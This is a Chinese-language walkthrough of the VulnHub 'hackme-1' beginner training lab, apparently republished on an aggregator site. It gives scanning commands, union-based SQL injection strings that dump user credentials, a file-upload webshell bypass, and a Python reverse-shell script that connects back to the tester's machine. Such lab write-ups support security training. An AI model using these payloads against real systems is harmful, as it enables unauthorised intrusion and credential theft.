栏目分类:
子分类:
返回
名师互学网用户登录
快速导航关闭
当前搜索
当前分类
子分类
实用工具
热门搜索
名师互学网 > IT > 系统运维 > 运维 > Linux

hackme-1初级渗透测试

Linux 更新时间: 发布时间: IT归档 最新发布 模块sitemap 名妆网 法律咨询 聚返吧 英语巴士网 伯小乐 网商动力

hackme-1初级渗透测试

Hackme-1
  • 环境搭建
    • 1. 详情
    • 2. 描述
  • 一:信息收集
    • 0x01主机发现
    • 端口扫描
    • 服务扫描
      • 服务器指纹信息查询
      • 网站目录爆破
  • 二:漏洞发现
    • 创建用户
    • SQL注入
    • MD5解密
    • 文件上传漏洞
      • 漏洞验证
  • 三:漏洞利用
    • 反弹shell法一: 一句话木马
  • 四:提权

环境搭建

测试机:kali:192.168.10.153
靶机:hackme-1:192.168.10.155

1. 详情
链接	https://www.vulnhub.com/entry/hackme-1,330/
发布日期	2019年7月18日
作者	x4bx54
难度	初学者,简单
2. 描述

‘hackme’ is a beginner difficulty level box. The goal is to gain
limited privilege access via web vulnerabilities and subsequently
privilege escalate as root. The lab was created to mimic real life
environment.

"hackme"是一个初学者难度级别的框。目标是通过 Web 漏洞获得有限的特权访问,然后将特权升级为
root。该靶机的创建是为了模拟现实生活环境。

0x02环境搭建

  1. 下载靶机
    官网链接直接下载

hackme-1下载地址

一:信息收集 0x01主机发现
arp-sacn -l

或者:

netdiscover -i eth0 -r 192.168.10.0/24

端口扫描
masscan --rate=10000 --ports 0-65535 192.168.10.155

服务扫描
 nmap -sV -T4 -O -p 22,80 192.168.10.155

服务器指纹信息查询
whatweb http://192.168.10.155

网站目录爆破
dirb http://192.168.10.155


访问靶机网站,搜集可用信息

二:漏洞发现

http://192.168.10.155/login.php 发现一个登录界面,
且有sign up now 点击创建新用户

创建用户


创建用户尝试登录
此处我创建
root
password的用户名密码

SQL注入

0x01 判断注入类型:

Windows os’ and 1=1#

windows os’ and 1=2#
发现为单引号字符型注入

0x02 判断字段数
Windows OS' order by 3#

发现字段数为三

0x03判断显示位
-1' union select 1,2,3#

0x04 查询库名
-1' union select database(),2,3#

0x05 查询表名
-1' union select group_concat(table_name),2,3 from information_schema.tables where table_schema='webapphacking'#

0x06查询列名
-1' union select group_concat(column_name),2,3 from information_schema.columns where table_name='users'#

0x07 查询user password列的数据
-1' union select group_concat(user),group_concat(pasword),3 from users#

MD5解密

将得到的数据进行MD5解密,得到用户名及密码,此处使用

superadmin 2386acb2cf356944177746fc92523983
Uncrackable

文件上传漏洞 漏洞验证

尝试登录,发现一文件上传的页面,尝试上传图片马

GIF89a 将此代码写入记事本,并修改后缀为jpg

抓包查看,将文件后缀名改为phpinfo.php

查看文件目录,发现文件上传成功

三:漏洞利用 反弹shell法一: 一句话木马

0x01 制作图片马:

copy a.jpg/b + tu.php/a b.jpg 将b.jpg上传,
访问上传的木马: http://192.168.30.207/uploads/b.php

0x02 蚁剑直连:

0x03 上传反弹shell脚本
将反弹shell放在网站根目录下,开启http服务

此为反弹shell脚本

import socket,subprocess,os
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect((“192.168.10.153”,443))
os.dup2(s.fileno(),0)
os.dup2(s.fileno(),1)
os.dup2(s.fileno(),2)
p=subprocess.call(["/bin/bash","-i"])


0x04 kali监听443 端口

反弹shell成功

四:提权

识别所存在的用户

cat /etc/passwd | grep /bin/bash

在/home/legacy路径下发现二进制文件touchmenot,执行二进制文件

./touchmenot


渗透结束,这个靶机考察了目录搜集,sql注入,文件上传漏洞,反弹shell等内容,靶机难度较为简单。

转载请注明:文章转载自 www.mshxw.com
本文地址:https://www.mshxw.com/it/599470.html
我们一直用心在做
关于我们 文章归档 网站地图 联系我们

版权所有 (c)2021-2022 MSHXW.COM

ICP备案号:晋ICP备2021003244-6号